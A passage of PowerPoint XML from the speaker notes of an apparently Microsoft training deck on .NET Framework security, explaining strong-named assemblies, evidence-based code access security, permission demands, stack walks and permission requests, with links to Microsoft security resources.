              <a:t>This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DEE41DBC-2AE9-49CD-9075-8D71BA3D720B}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>34</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s-US" dirty="0" smtClean="0"/>
              <a:t>http://www.microsoft.com/downloads/details.aspx?familyid=051EE83C-5CCF-48ED-8463-02F56A6BFC09&amp;displaylang=en</a:t>
            </a:r>
            <a:endParaRPr lang="es-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Header Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="hdr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>MGB 2003</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>© 2004 Microsoft Corporation. All rights reserved.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DEE41DBC-2AE9-49CD-9075-8D71BA3D720B}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>35</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D54CF75B-2ACD-4E1C-8C36-FE80C36DBE59}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="428034" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRot="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="428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72998509-B2E3-48D5-9F4B-CBB6FC45F458}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="462850" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRot="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4189413" y="455613"/>
            <a:ext cx="2541587" cy="1906587"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="462851" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2527300"/>
            <a:ext cx="5981700" cy="5986463"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Next steps include going to the Microsoft Web site to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Get the latest security information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Get additional security training.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>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91151797-A6A2-4CE8-9893-22554454B974}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="464898" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRot="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4189413" y="455613"/>
            <a:ext cx="2541587" cy="1906587"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="464899" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2527300"/>
            <a:ext cx="5981700" cy="5986463"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>More technical information for IT professional and developers is available on the following Web sites:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Microsoft Security Site (all audiences)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.microsoft.com/security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>MSDN Security Site (developers)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://msdn.microsoft.com/security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>TechNet Security Site (IT professionals)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.microsoft.com/technet/security</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4D9065A9-AC09-4083-B24A-D33A97CCC37E}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="453634" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRot="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="453635" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0"/>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F0EF713C-47B2-42CC-9D5E-86318E540D68}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130052" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noRot="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130053" name="Rectangle 5"/>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A99FBBB9-F709-47D6-AC8C-21EDEFDDED99}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="441346" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRot="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="441347" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0"/>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9A327017-69A6-4622-8DDE-905632AD4CF6}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186372" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noRot="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186373" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Strong names are unique identifiers for your assemblies. You can generate strong names and then use them to digitally sign your assemblies. Strong-naming solves problems (such as version control and backward compatibility issues) that are caused when components are shared by multiple applications. In effect, strong names associate a distinct build of a component assembly with the client application. A distinct build is indicated by a combination of a version number and a special value that is called the publicKeyToken.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>You can generate a public/private key pair for signing your assembly by using the Strong Name tool (Sn.exe).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>When you have a private key, you can specify the key file and the version number to be assigned when you compile the assembly, using attributes as shown:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>[assembly: System.Reflection.AssemblyVersion("1.0.0.0")]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>[assembly: System.Reflection.AssemblyKeyFile("orgKey.snk")]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>A strong-named assembly prevents attackers from tampering with the assembly's code, and allows confirmation of the assembly publisher's identity. Strong-named assemblies also allow side-by-side components to co-exist, which aids version control and backward compatibility.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53149FAD-F2DD-4ACB-B6F9-BD6939F20B37}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="318468" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noRot="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="318469" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Win32 security works on the principal of user authentication and authorization.  For example, if a user places a floppy disk into the computer, lists the directory, and chooses to execute the file ‘trustme.exe’, the operating system will oblige, and run the application in the security context of the logged on user.  Therefore, the application (which may be malicious) will have all of the system privileges granted to the user in question.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>.NET provides you with the concept of evidence-based security.  This security works on top of Win32 security; it does </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> replace it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Irrespective of the logged on user, the .NET Framework collects evidence about an assembly and presents it to the security system.  After the evidence has been gathered, the runtime will decide on whether or not the code will be allowed to complete all of the tasks that it requests.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Some evidence is considered stronger by the runtime than other evidence. For example, strong names and Authenticode signatures are considered stronger than URL or zone evidence, because it is more difficult for an attacker to fake values for these elements. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Developers can create their own unique evidence.  For example, they can create evidence that indicates an assembly was developed internally and reviewed by the IT department for security flaws.</a:t>
            </a:r>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AF1F0AEE-4115-41FD-9C74-97C660E1AB0D}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="393220" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noRot="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="393221" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>In contrast to many security systems, the .NET Framework security policy is based on assembly identity, rather than user identity.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Security policies map assembly evidence to permissions that are granted for that assembly. Security policies use code groups and policy levels to achieve this mapping.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The .NET Framework includes multiple levels of policy configuration, including enterprise, machine, and user settings. Developers use an intersection of different policy settings when determining permissions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Code groups and policy levels give administrators fine-grained control over security policy. Administrators can configure policies to grant a set of permissions for the assembly based on a variety of evidence.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Administrators can use Active Directory to ease the deployment of security policies.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D1B8502D-6B5F-46F6-9032-3D3607B82770}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="322564" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noRot="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="322565" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4186238"/>
            <a:ext cx="5486400" cy="4638675"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Imperative security checks involve creating instances of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Permission</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> objects at run time and invoking methods on them, such as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Demand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> method. For example, the developer may create an instance of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>FileIOPermission</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> object, and demand the Read permission for a specific file. If the call to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Demand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> method succeeds, execution continues, otherwise, a security exception is thrown. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>With declarative security checks, permissions are specified by using attributes instead of creating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Permission</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> objects at run time. At design time, developers specify permissions (such as the FileIOPermission Read access permission for a specific file) by including the attributes in class definitions or individual methods. Although the same types of permission can be managed as with the imperative approach, the declarative process makes it easier to review the required permissions for a class or method. However, because the permissions apply only to classes or methods, this approach is slightly less flexible than imperative checking. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>While obtaining evidence for both imperative and declarative security checks, the runtime will walk the stack, assuring that less privileged code further up the stack is not trying to execute code for which it does not normally have permission. However, you can use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Assert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> method to change the behavior of the stack walk. When the method in which you call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Assert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> is reached, the stack walk stops. This means that permissions for the callers of your code are not checked. The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Assert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> method is most useful when your code needs access to a protected resource, but your code does not give access to that resource to its callers.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D9285ED7-4953-4619-98C3-048C7AAB4748}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="321540" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noRot="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="321541" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>When the code accessing a protected resource demands a permission, a stack walk is performed. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The security system checks the permission granted to each caller. If each caller is granted the permission, the demand succeeds, otherwise a security exception is thrown. This approach prevents an assembly without permissions, using your assemblies to perform unauthorized actions.</a:t>
            </a:r>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MGB 2003</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>© 2004 Microsoft Corporation. All rights reserved.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{571A8109-19A9-4D15-B9D5-A285E08F3EDA}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="326660" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noRot="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="326661" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Developers use permission requests to state the permission requirements of their assemblies. Permission requests are implemented as assembly attributes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Using permission requests makes it easier to run code with least privilege. If an assembly does not receive its minimum permission request at load time, it does not load, rather than waiting until an unauthorized operation is attempted and then failing.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>In the slide example, an assembly requests the Unmanaged code permission. If that permission is denied at load time, the assembly will not continue.</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384175" y="981075"/>
            <a:ext cx="7772400" cy="1571625"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="5400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18435" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384175" y="4418013"/>
            <a:ext cx="7861300" cy="585787"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>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94500" y="127000"/>
            <a:ext cx="2228850" cy="3671888"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="es-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Vertical Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" orient="vert" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107950" y="127000"/>
            <a:ext cx="6534150" cy="3671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27000" y="127000"/>
            <a:ext cx="8870950" cy="695325"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
